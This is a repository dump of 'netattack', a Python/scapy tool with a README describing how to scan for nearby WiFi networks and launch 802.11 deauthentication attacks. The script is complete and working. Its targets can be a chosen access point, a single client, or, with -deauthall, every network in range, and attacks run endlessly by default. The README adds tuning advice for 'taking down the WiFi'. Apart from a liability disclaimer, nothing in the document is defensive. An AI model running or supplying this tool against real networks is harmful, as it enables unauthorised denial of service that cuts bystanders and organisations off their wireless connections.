├── LICENSE ├── README.md └── netattack.py /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2017 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # NETATTACK 2 | The netattack.py is a python script that allows you to scan your local area for WiFi Networks and perform deauthentification attacks. The effectiveness and power of this script highly depends on your wireless card. 3 | 4 | ## NETATTACK 2 RELEASED 5 | https://github.com/chrizator/netattack2/ 6 | ## USAGE 7 | 8 | ### EASY 9 | #### SCANNING FOR WIFI NETWORKS 10 | ``` 11 | python netattack.py -scan -mon 12 | ``` 13 | This example will perform a WiFi network scan. The BSSID, ESSID and the Channel will be listet in a table. 14 | ``` 15 | -scan | --scan 16 | ``` 17 | This parameter must be called when you want to do a scan. It's one of the main commands. It is searching for beacon frames that are sent by routers to notify there presence. 18 | ``` 19 | -mon | --monitor 20 | ``` 21 | By calling this parameter the script automatically detects you wireless card and puts it into monitoring mode to capture the ongoing traffic. 22 | If you know the name of your wireless card and it's already working in monitoring mode you can call 23 | ``` 24 | -i 25 | ``` 26 | This can be used instead of ```-mon```. 27 | #### DEAUTHENTIFICATION ATTACK 28 | ``` 29 | python netattack.py -deauth -b AB:CD:EF:GH:IJ:KL -u 12:34:56:78:91:23 -c 4 -mon 30 | ``` 31 | This command will obviously perform a deauthentification attack. 32 | ``` 33 | -deauth | --deauth 34 | ``` 35 | This parameter is a main parameter as well as scan. It is necessary to call if you want to deauth attack a certain target. 36 | ``` 37 | -b | --bssid 38 | ``` 39 | With ```-b``` you select the AP's MAC-Address (BSSID). The ```-deauth``` parameter requires one or multiple BSSID's 40 | ``` 41 | -u | --client 42 | ``` 43 | If you don't want to attack the whole network, but a single user/client/device, you can do this with ```-u```. It is not necessary. 44 | ``` 45 | -c | --channel 46 | ``` 47 | By adding this parameter, your deauthentification attack is going to be performed on the entered channel. The usage of ```-c``` is highly recommended since the attack will be a failure if the wrong channel is used. The channel of the AP can be seen by doing a WiFi scan (```-scan```). If you don't add ```-c``` the attack will take place on the current channel. 48 | 49 | The ```-mon``` or ```-i``` is necessary for this attack as well. 50 | 51 | #### DEAUTHENTIFICATION ATTACK ON EVERYBODY 52 | ``` 53 | python netattack.py -deauthall -i [IFACE] 54 | ``` 55 | When this command is called, the script automatically searches for AP in your area. After the search it start deauth-attacking all of the found AP's. The ```-deauthall``` parameter only needs an interface to get it working. 56 | ATTENTION: If you want all of this attacks to be as efficient as possible, have a look at the following "ADVANCED"-section 57 | 58 | ### ADVANCED 59 | ``` 60 | -p | --packetburst 61 | ``` 62 | This parameter is understood as the packetburst. Especially when you are targeting multiple AP's or even performing a ```-deauthall``` attack, the command is a must have. It defines the amount of deauth-packages to send after switching the target. When not adding the parameter it is going to be set to 64 by default. But that is highly unefficient if you are attacking 4+ AP's. 63 | ``` 64 | -t | --timeout 65 | ``` 66 | This parameter can be added to a ```-scan``` or ```-deauth```. If it's added to the ```-scan``` parameter it defines the delay while switching the channel. It is set to 0.75s by default, so it is waiting 0.75s on each channel to collect beacon frames. 67 | If it's added to the ```-deauth``` parameter, it defines the delay between each packetburst. This can be used to decrease the intense of the attack or to attack the target(s) at a certain time. 68 | ``` 69 | -cf | --channelformat 70 | ``` 71 | This parameter can only be added to ```-scan```. It shows a more detailed output while scanning. It's mainly recommended when the location changes and with it the AP's. 72 | ``` 73 | -a | --amount 74 | ``` 75 | This parameter can only be added to ```-deauth```. It defines a certain amount of packetbursts to send. This can be used for taking down the WiFi for a certain time. 76 | 77 | ## REQUIREMENTS 78 | - Python 2.5+ (not Python 3+) 79 | - Modules: 80 | - scapy 81 | - argparse 82 | - sys 83 | - OS 84 | - threading 85 | - logging 86 | - iw(config) 87 | - OFC LINUX 88 | 89 | ## DISCLAIMER AND LICENSE 90 | THE OWNER AND PRODUCER OF THIS SOFTWARE IS NOT LIABLE FOR ANY DAMAGE OR ANY LAW VIOLATIONS CAUSED BY THE SOFTWARE. 91 | -------------------------------------------------------------------------------- /netattack.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import sys 4 | import os 5 | import time 6 | import argparse 7 | from threading import Thread 8 | import logging 9 | logging.getLogger('scapy.runtime').setLevel(logging.ERROR) 10 | from scapy.all import * 11 | conf.verb = 0 12 | 13 | W = '\033[0m' # white (normal) 14 | R = '\033[31m' # red 15 | G = '\033[32m' # green 16 | O = '\033[33m' # orange 17 | P = '\033[35m' # purple 18 | BOLD = '\033[1m' # bold 19 | THIN = '\033[1m' # normal 20 | 21 | # creating arguments 22 | def argument_parser(): 23 | parser = argparse.ArgumentParser(usage=''' 24 | 25 | '''+BOLD+'''SCAN NETWORKS:'''+THIN+O+''' 26 | -scan (Main command)'''+W+''' 27 | -i or -mon (Interfaces) 28 | -cf (More detailed output format) 29 | -t (Set channel switch delay) 30 | -nr (Don't do a rescan) 31 | 32 | '''+BOLD+'''DEAUTH CERTAIN NETWORKS:'''+THIN+O+''' 33 | -deauth (Main command)'''+W+''' 34 | -b (Add a BSSID) 35 | -u (Add a client) 36 | -i or -mon (Interfaces) 37 | -p (Change Packetburst) 38 | -t (set time Interval) 39 | 40 | '''+BOLD+'''DEAUTH ALL NETWORKS:'''+THIN+O+''' 41 | -deauthall (Main command)'''+W+''' 42 | -i or -mon (Interfaces) 43 | -p (Packetburst)''') 44 | 45 | parser.add_argument('-mon', 46 | '--monitor', 47 | action='store_true', 48 | help='This activates the monitoring mode \ 49 | and automatically searches for your wlan device.') 50 | parser.add_argument('-scan', 51 | '--scan', 52 | action='store_true', 53 | help='This is one of the main parameters. \ 54 | It searches for all available WiFi-Networks. \ 55 | Other parameters can be added optionally.') 56 | parser.add_argument('-cf', 57 | '--channelformat', 58 | action='store_true', 59 | help='It activates the channelformat. \ 60 | It\'s kind of verbose layout of searching. \ 61 | Espacially useful if searching for 1 network.') 62 | parser.add_argument('-t', 63 | '--timeout', 64 | type=float, 65 | help='This is setting a delay. \ 66 | It can be used to add a delay to deauth \ 67 | or a delay for switching the channel while scanning. \ 68 | DEFAULT = 0.75') 69 | parser.add_argument('-nr', 70 | '--norescan', 71 | action='store_true', 72 | help='-nr can only be used with -scan. \ 73 | This deactivates multiple scans \ 74 | and stops when channel 14 is reached.') 75 | parser.add_argument('-deauth', 76 | '--deauth', 77 | action='store_true', 78 | help='This is one of the main parameters. \ 79 | It deauth-attacks a certain BSSID. \ 80 | Adding a client is optionally.') 81 | parser.add_argument('-deauthall', 82 | '--deauthall', 83 | action='store_true', 84 | help='This is one of the main parameters. \ 85 | It searches all the WiFi Networks near by \ 86 | and deauth-attacks them.') 87 | parser.add_argument('-b', 88 | '--bssid', 89 | nargs='*', 90 | help='With this you add a BSSID to a deauth. \ 91 | It\'s a necessary parameter for -deauth.') 92 | parser.add_argument('-a', 93 | '--amount', 94 | default=0, 95 | type=int, 96 | help='This is the amount of deauth-packages to be send. \ 97 | It can only be used with -deauth \ 98 | DEFAULT = infinite') 99 | parser.add_argument('-u', 100 | '--client', 101 | default='FF:FF:FF:FF:FF:FF', 102 | help='This adds a client to a deauth-attack. \ 103 | It can only be used with -deauth and is optionally.\ 104 | DEFAULT = FF:FF:FF:FF:FF:FF (Broadcast)') 105 | parser.add_argument('-c', 106 | '--channel', 107 | type=int, 108 | help='This adds a channel to a deauth-attack. \ 109 | It can only be used with -d. \ 110 | If there is no certain channel the current channel will be used.') 111 | parser.add_argument('-p', 112 | '--packetburst', 113 | type=int, 114 | default=64, 115 | help='This sets the amount of packets in one burst. \ 116 | It can only be used with -d \ 117 | DEFAULT = 64') 118 | parser.add_argument('-i', 119 | '--interface', 120 | help='This is a necessary parameter. \ 121 | It calls the monitoring interface. \ 122 | This parameter needs to be included everywhere.') 123 | 124 | return parser 125 | 126 | def throw_error(): 127 | # invalid arguments handling 128 | if not args.deauth and not args.scan and not args.deauthall and not args.monitor: 129 | argument_parser().print_usage() 130 | sys.exit(0) 131 | if not args.interface and not args.monitor: 132 | print('[' +R+ '-' +W+'] No interface selected.') 133 | sys.exit(0) 134 | if args.deauth and args.channelformat: 135 | print('[' +R+ '-' +W+'] Parameter -cf not available when deauthing.') 136 | sys.exit(0) 137 | if args.deauth and not args.bssid: 138 | print('[' +R+ '-' +W+'] Error. No BSSID selected.') 139 | sys.exit(0) 140 | if args.scan and args.packetburst != 64: 141 | print('[' +R+ '-' +W+'] Parameter -p not available when scanning.') 142 | if args.scan and args.amount: 143 | print('[' +R+ '-' +W+'] Parameter -a not available when scanning.') 144 | sys.exit(0) 145 | if args.scan and args.bssid: 146 | print('[' +R+ '-' +W+'] Parameter -b not available when scanning.') 147 | sys.exit(0) 148 | if args.scan and args.deauth: 149 | print('[' +R+ '-' +W+'] Scan and Deauth can\'t be executed at the same time.') 150 | sys.exit(0) 151 | if args.deauth and args.norescan: 152 | print('[' +R+ '-' +W+'] Parameter -nr not available when deauthing.') 153 | if args.deauthall: 154 | if args.bssid or args.channel or args.amount or args.deauth or args.norescan or args.timeout or args.channelformat or args.scan: 155 | print('[' +R+ '-' +W+'] (1) -deauthall -i ["iface"] -p ["packets"]| no more parameters. (2) Remove -deauthall') 156 | if args.bssid and args.client != 'FF:FF:FF:FF:FF:FF': 157 | if len(args.bssid) > 1: 158 | print('[' +R+ '-' +W+'] Unable to add clients if there are multiple BSSIDs.') 159 | sys.exit(0) 160 | if args.interface and args.monitor: 161 | print('[' +R+ '-' +W+'] You can\'t use -i and -mon. Try only one of them.') 162 | sys.exit(0) 163 | 164 | 165 | # # # # # # # # # # # # # # # 166 | # SCAN # 167 | # # # # # # # # # # # # # # # 168 | 169 | # handling the packages 170 | def pckt_handler(pckt): 171 | if pckt.haslayer(Dot11): #-> check if pckt type 802.11 172 | if pckt.type == 0 and pckt.subtype == 8: # check if Beacon frame 173 | if pckt.addr2 not in APs: 174 | APs[pckt.addr2] = on_channel #-> add to APs dict 175 | output_aps(pckt.addr2, pckt.info, on_channel) #-> print it out 176 | 177 | # printing found ap 178 | def output_aps(bssid, essid, channel): 179 | ch_space = 2 # leave different space for channel numbers 180 | if len(str(channel)) == 1: 181 | ch_space = 3 182 | 183 | if args.channelformat: 184 | print('[' +G+ '+' +W+ '] [' +P+ 'BSSID' +W+ '] '+str(bssid).upper()+' '*2+'|'+' '*2+'[' +P+ 'CH' +W+ '] '+str(channel)+' '*ch_space+'|'+' '*2+'[' +P+ 'ESSID' +W+ '] '+essid+'') 185 | 186 | else: 187 | print(str(bssid).upper() + ' | ' + str(channel) + ' '*ch_space + '| ' + str(essid)) 188 | 189 | 190 | # hopping between wifi channels 191 | def channel_hop(): 192 | global on_channel 193 | 194 | timeout = 0.75 195 | 196 | if args.timeout: 197 | timeout = args.timeout 198 | 199 | if not args.channelformat: 200 | print('\n[' +O+ '*' +W+ '] Searching for WiFi Networks...\n') 201 | print(O+ 'MAC' + ' '*19 + 'CH' + ' '*5 + 'ESSID' +W) 202 | 203 | while True: 204 | if on_channel > 14: 205 | if args.norescan: 206 | print('\nPress CTRL-C to quit...') 207 | sys.exit(0) 208 | elif not rescan: 209 | break 210 | else: 211 | on_channel = 1 212 | if args.channelformat: 213 | print('\n--------------- RESCAN ---------------\n') 214 | continue 215 | 216 | if args.channelformat: 217 | print('[CHANNEL] ' + str(on_channel) + '/14') 218 | 219 | os.system('iwconfig ' + iface + ' channel ' + str(on_channel)) 220 | 221 | time.sleep(timeout) 222 | on_channel += 1 223 | 224 | 225 | # # # # # # # # # # # # # # # 226 | # DEAUTH # 227 | # # # # # # # # # # # # # # # 228 | 229 | def set_channel(): 230 | channel = 4 231 | if args.channel: 232 | channel = args.channel 233 | os.system('iwconfig ' + iface + ' channel ' + str(channel)) 234 | 235 | # creating and managing packets 236 | def deauth(args): 237 | bssid = args.bssid 238 | client = args.client 239 | amount = args.amount 240 | sleep = 0 241 | endless = False 242 | if amount == 0: 243 | endless = True 244 | if args.timeout: 245 | sleep = args.timeout 246 | 247 | while endless: 248 | for ap in bssid: 249 | ap_c_pckt = Dot11(addr1=client, addr2=ap, addr3=ap) / Dot11Deauth() 250 | if client != 'FF:FF:FF:FF:FF:FF': 251 | c_ap_pckt = Dot11(addr1=ap, addr2=client, addr3=ap) / Dot11Deauth() 252 | try: 253 | for x in range(args.packetburst): 254 | send(ap_c_pckt) 255 | if client != 'FF:FF:FF:FF:FF:FF': 256 | send(c_ap_pckt) 257 | print('[' +G+ '+' +W+ '] Sent Deauth-Packets to ' + ap) 258 | time.sleep(sleep) 259 | except(KeyboardInterrupt): 260 | print('\n[' +R+ '!' +W+ '] ENDING SCRIPT...') 261 | sys.exit(0) 262 | 263 | while amount > 0 and not endless: 264 | for ap in bssid: 265 | ap_c_pckt = Dot11(addr1=client, addr2=ap, addr3=ap) / Dot11Deauth() 266 | if client != 'FF:FF:FF:FF:FF:FF': 267 | c_ap_pckt = Dot11(addr1=ap, addr2=client, addr3=ap) / Dot11Deauth() 268 | try: 269 | for x in range(args.packetburst): 270 | send(ap_c_pckt) 271 | if client != 'FF:FF:FF:FF:FF:FF': 272 | send(c_ap_pckt) 273 | print('[' +G+ '+' +W+ '] Sent Deauth-Packets to ' + ap) 274 | 275 | amount -= 1 276 | time.sleep(sleep) 277 | 278 | except (KeyboardInterrupt): 279 | print('\n[' +R+ '!' +W+ '] ENDING SCRIPT...') 280 | sys.exit(0) 281 | 282 | print('[' +R+ '!' +W+ '] Finished successfully.') 283 | 284 | 285 | def deauth_all(): 286 | print('\n[' +O+ '*' +W+ '] Starting deauth...\n') 287 | while True: 288 | for ap in APs: 289 | for x in range(args.packetburst): 290 | try: 291 | ap_c_pckt = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=ap, addr3=ap) / Dot11Deauth() 292 | os.system('iwconfig ' + iface + ' channel ' + str(APs[ap])) 293 | send(ap_c_pckt) 294 | except (KeyboardInterrupt): 295 | print('\n[' +R+ '!' +W+ '] ENDING SCRIPT...') 296 | sys.exit(0) 297 | print('[' +G+ '+' +W+ '] Sent Deauth-Packets to ' + str(ap).upper()) 298 | 299 | 300 | # # # # # # # # # # # # # # # 301 | # MONITOR # 302 | # # # # # # # # # # # # # # # 303 | 304 | def monitor_on(): 305 | ifaces = os.listdir('/sys/class/net/') 306 | status = False 307 | for iface in ifaces: 308 | if 'wlan' in iface: 309 | print('\n[' +G+ '+' +W+ '] Interface found!\nTurning on monitoring mode...') 310 | os.system('ifconfig ' + iface + ' down') 311 | os.system('iwconfig ' + iface + ' mode monitor') 312 | os.system('ifconfig ' + iface + ' up') 313 | print('[' +G+ '+' +W+ '] Turned on monitoring mode on: ' + iface) 314 | status = True 315 | return iface 316 | if status == False: 317 | print('[' +R+ '-' +W+'] No interface found. Try it manually.') 318 | sys.exit(0) 319 | 320 | 321 | # # # # # # # # # # # # # # # 322 | # MAIN # 323 | # # # # # # # # # # # # # # # 324 | 325 | if __name__ == '__main__': 326 | print(P+'* * * * * * * * * * * * * * * * * *') 327 | print('* N E T A T T A C K by chrizator *') 328 | print('* * * * * * * * * * * * * * * * * *'+W) 329 | 330 | args = argument_parser().parse_args() 331 | APs = {} 332 | on_channel = 1 333 | rescan = True 334 | 335 | throw_error() 336 | 337 | iface = None 338 | if args.interface: 339 | iface = args.interface 340 | if args.monitor: 341 | iface = monitor_on() 342 | 343 | conf.iface = iface #-> set scapy's interface 344 | 345 | ## SCAN ## 346 | if args.scan: 347 | # channel hopping thread 348 | hop_t = Thread(target=channel_hop, args=[]) 349 | hop_t.daemon = True 350 | hop_t.start() 351 | 352 | 353 | sniff(iface=iface, prn=pckt_handler, store=0) 354 | 355 | 356 | ## DEAUTH ## 357 | if args.deauth: 358 | set_channel() 359 | deauth(args) 360 | 361 | 362 | ## DEAUTHALL# 363 | if args.deauthall: 364 | rescan = False 365 | 366 | hop_t = Thread(target=channel_hop, args=[]) 367 | hop_t.daemon = True 368 | hop_t.start() 369 | 370 | sniff(iface=iface, prn=pckt_handler, store=0, timeout=13) 371 | deauth_all() 372 | --------------------------------------------------------------------------------